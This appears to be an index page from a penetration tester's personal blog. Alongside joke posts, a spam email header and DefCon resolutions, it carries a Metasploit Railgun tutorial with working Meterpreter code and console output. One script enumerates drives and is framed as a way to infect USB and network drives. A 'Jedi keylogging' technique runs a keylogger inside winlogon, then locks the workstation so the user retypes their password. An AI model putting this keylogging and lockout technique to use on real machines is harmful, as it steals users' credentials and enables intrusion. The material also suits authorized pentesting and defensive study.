Post Exploitation Command Lists

I’ve had a private list of commands that I run on Windows or Linux when I pop a shell, as I’m sure most pentesters do. It isn’t so much a thing of hoarding as much it is just jumbled notes that are ‘not worth posting’

Well, I made two (now 3) public google docs (anyone can edit) *don’t be a dick clause

• Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US
• Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US
• OSX Post Exploitation: https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US
• Obsucure Syststem’s Post Exploitation: https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit
• Metasploit Post Exploitation: https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit

Both have filled out A LOT since I first posted them but if you have that one trick command you’d like to share or just want to copy/print the list for your own uses, thats fine too. I plan to keep these publicly editable as long as people obey the DBAD clause.

If you don’t know any cool commands but happen to be a tech writer and can make it look beautiful, then great! Please do. There are tables at the bottom that I want to move everything to, or something like it, but if you can do it better…

Anyways, look forward to seeing how this thing grows.

Read More

Intro to RailGun: WIN API for Meterpreter

Back on June 13th, “Patrick HVE” released RAILGUN:

https://dev.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the the Metasploit trunk with 9709, 9710, 9711 and 9712:

Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API dlls:

• iphlpapi
• ws2_32
• kernel32
• ntdll
• user32
• advapi32

(You can find out exactly what functions are available by default in the api.rb file)

It’s also very extensible, it doesn’t have a DLL or function you need? But you can read all about in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy:

List Drives:

The problem that I’ve had on a number of pentests is that you get shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached.

• net use – Shows you what Network drives are connected, but not physical ones
• fsutil fsinfo drives – You must be an administrator to ride this train
• fdisk /status – Only on OLD versions of DOS, not sure when this disappeared

But railgun solves this problem with a really short script:

# Load the Railgun plugin  **_Update: You no longer need this step_**
# client.core.use("railgun")

# Make the API call to enum drive letters
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Math magic to convert the binary to letters
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
	test = letters[i,1]
	rem = a % (2**(i+1))
	if rem > 0
		drives << test
		a = a - rem
	end
end
print_line("Drives Available = #{drives.inspect}")

Output: Drives Available = ["A", "C", "D", "P", "X"]

Save this as a meterpreter script and it’ll print every logical drive attached to the system even as a limited user (that the user can see).

Logical drives include: (hdd, network, mass storage, optical, etc). This opens up the doors to infecting USB sticks and network drives…

JEDI KEYLOGGING:

One of the problems with keylogging is you never know when that person will log in, and if you’re using a client side, they have probably already logged in and you’re hoping they log into a portal or some other password protected site.

Railgun to the rescue again:

# Start the keylogger running in the background dumping keys every 15 seconds, attached to Winlogon**

meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter >
[*] winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

Drop to IRB to initialize railgun and lockout the workstation, forcing the user to use their credentials again.**

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter
clientclient.core.use("railgun")
=> true
client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
exit
meterpreter >

Set up “tail -f” going on the log file for the keylogger and then kill the keylogger when you’ve gotten what you came for.

meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...meterpreter >

Hope you have fun with railgun and shoot me an email mubix@hak5.org or leave a comment if you have any other crazy uses for railgun.

Read More

USMC: Crack Down on Tats

(This is a joke) IN BREAKING NEWS: The Marine Corps has adopted the no Tat policy. In this bold move, it is Dishonorably discharging 80% of it’s current personnel due to this new “Clean or Out” program.

Read More

Toilet Peril

One should never be made to make a decision such as the one I’m about to share with you: Where I work, there are two Male restrooms. One is downstairs, still within ‘hurry’ distance, and the other is just across the hall. You are probably thinking, ‘Where is the decision in that?’. Well this is where it gets interesting. Both are alright for number 1 traffic. No big deal, in and out. But number 2 is a different story. Here are the stats on both restrooms:

Upstairs: 3 stalls, one is out of order (Stall 2). Stall 1 never stops flushing (so when you wipe, your hand gets wet), Stall 3 will flush, so fast that it will actually make your pants wet.. no matter what.. (this thing gets distance) and the whole bathroom is pretty dirty. Although this bathroom is nice and warm. (See the next line for why this is an important statement)

Downstairs: 2 stalls, freezing cold, so cold that constipation is a natural reaction. On the upside, it is always clean and hardly anyone is ever in there so, if you are ‘loud’ you have the convenience. Again, it is down a flight of stairs.

Which would you choose?

Read More

Brute Force Spam

Here is the source of the email I got (new hacking sytle, brute force spamming) :

From - Mon Aug 01 00:51:54 2005  
Received: from andylau.net (andylau-net.mr.outblaze.com [205.158.62.181])  
by cpe-066-056-247-120.ec.res.rr.com (Postfix) with ESMTP id CACB489394  
for <sgrduklhaergt@room362.com>; Sun, 31 Jul 2005 12:08:10 -0700  
From: "Pancakes O. Making" <riel@andylau.net>  
To: Sgrduklhaergt <sgrduklhaergt@room362.com>  
Subject: hi  
Date: Sun, 31 Jul 2005 12:08:10 -0700  
Message-ID: <001101c59603$b5b7b45d$2c4260db@andylau.net>  
MIME-Version: 1.0  
Content-Type: text/plain  
Content-Transfer-Encoding: 7bit  
X-Priority: 3 (Normal)  
X-MSMail-Priority: Normal  
X-Mailer: Microsoft Outlook, Build 10.0.2616  
Importance: Normal  
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000  
X-AntiVirus: OK! AntiVir MailGate Version 2.0.1; AVE: 6.15.0.0; VDF: 6.15.0.6  
X-RCPT-TO: <sgrduklhaergt@room362.com>  
Status: U  
X-UIDL: 412837401  
  
<b>hi dude! i just wanted to test your e-mail</b></i>  

Why would someone ‘test your email’ to a extremely random user?

Read More

Def Con Resolutions

To celebrate the close of DefCon 13 here are my…

New Defcon (14) Resolutions.

• Get l0gic a girl to take to Def Con
• Get duder out to the east coast
• Make and print Project Mentor T-Shirts to give away and wear to DefCon
• Creat a DCMar Group
• Watch Family Guy and Futurerama episodes as instructed by l0gic
• Get BFA w/ Card

Read More

Air Force Infantry Discovered

I have officially uncovered the US Air Force’s TOP SECRET plans at making a deadly infantry. The following image was stolen from a secret base in Roswell. I will stay with this story as long as it takes to unveil the truth.

Read More